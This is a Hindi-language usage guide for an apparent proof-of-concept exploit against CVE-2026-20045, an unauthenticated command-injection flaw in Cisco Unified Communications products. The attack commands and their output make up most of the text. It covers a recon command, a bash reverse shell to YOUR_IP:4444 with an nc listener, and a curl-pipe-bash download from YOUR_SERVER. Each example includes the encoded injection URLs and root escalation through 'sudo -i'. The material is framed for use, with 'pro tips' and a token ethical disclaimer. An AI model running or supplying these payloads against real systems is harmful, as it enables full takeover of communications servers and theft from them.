
CVE-2026-20045 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cisco Unified Communications उत्पादों में एक गंभीर बिना प्रमाणीकरण वाला RCE है, जो कमांड इंजेक्शन और रूट एस्केलेशन के साथ रिवर्स शेल को सक्षम बनाता है।

एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) कमज़ोरियाँ जो कई Cisco Unified Communications उत्पादों को प्रभावित करती है। पैच जारी होने से पहले इसका वास्तविक दुनिया में सक्रिय रूप से शोषण किया गया था।
इसका मतलब है कि एक हमलावर प्रभावित सिस्टम को दूर से पूरी तरह अपने कब्जे में ले सकता है।
यहाँ PoC स्क्रिप्ट चलाने के लिए उपयोग उदाहरणों के साथ एक सुधारित गाइड है, जिसमें ठीक वही शामिल है जो आप अपने टर्मिनल में देखेंगे यदि शोषण किसी कमज़ोर Cisco Unified Communications लक्ष्य (अनपैच्ड वेब इंटरफ़ेस उजागर) पर सफल होता है। मैंने बेहतर पठनीयता के लिए इमोजी, रंगीन कोड ब्लॉक (मार्कडाउन के माध्यम से), और संरचित अनुभाग जोड़े हैं। 😎
यह उपयोगकर्ता ID, उपयोगकर्ता नाम, और सिस्टम विवरण प्राप्त करने के लिए सरल कमांड चलाता है।
कमांड:
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"
यदि यह काम करता है तो आप क्या देखेंगे (सफल आउटपुट):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj
[*] Initial command: id && whoami && uname -a
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Possible command output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
root
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
------------------------------------------------------------
🔑 मुख्य संकेत: हरे [+] संकेतक, HTTP 200 स्थिति, और आउटपुट ब्लॉक में कमांड परिणाम। यदि कोई आउटपुट नहीं दिखता लेकिन स्थिति 200 है, तो यह अभी भी चुपचाप काम कर गया!
यह आपकी मशीन पर एक इंटरैक्टिव शेल वापस खोलता है। पहले, एक लिसनर शुरू करें: nc -lvnp 4444।
कमांड:
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
यदि यह काम करता है तो आप क्या देखेंगे (स्क्रिप्ट टर्मिनल में):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
लिसनर (nc) टर्मिनल में आप क्या देखेंगे:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
root@ucm-server:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ucm-server:~#
🚀 मुख्य संकेत: स्क्रिप्ट सफलता संदेश दिखाती है; लिसनर को तुरंत रूट शेल प्रॉम्प्ट मिलता है। वहां इंटरैक्ट करने के लिए कमांड टाइप करें!
यह आपके सर्वर से एक स्क्रिप्ट डाउनलोड और चलाता है।
कमांड:
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"
यदि यह काम करता है तो आप क्या देखेंगे (सफल आउटपुट):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
📥 मुख्य संकेत: 200 स्थिति कोड; लक्ष्य पर सत्यापित करें (जैसे, लॉग/फ़ाइलें जांचें) या अपने सर्वर पर (डाउनलोड लॉग)। यदि पेलोड चुप है तो कोई सीधा आउटपुट नहीं।
💡 प्रो टिप्स:
sudo के साथ चलाएं।HTTP प्रबंधन इंटरफ़ेस में उपयोगकर्ता-आपूर्ति इनपुट का अनुचित सत्यापन, जो कमांड इंजेक्शन की अनुमति देता है जो रिमोट कोड एक्ज़ीक्यूशन की ओर ले जाता है।
सभी PoC कोड केवल अधिकृत सिस्टम पर नैतिक, शैक्षिक उपयोग के लिए हैं। अनधिकृत शोषण अवैध है; दुरुपयोग के लिए कोई दायित्व नहीं लिया जाता है। 😈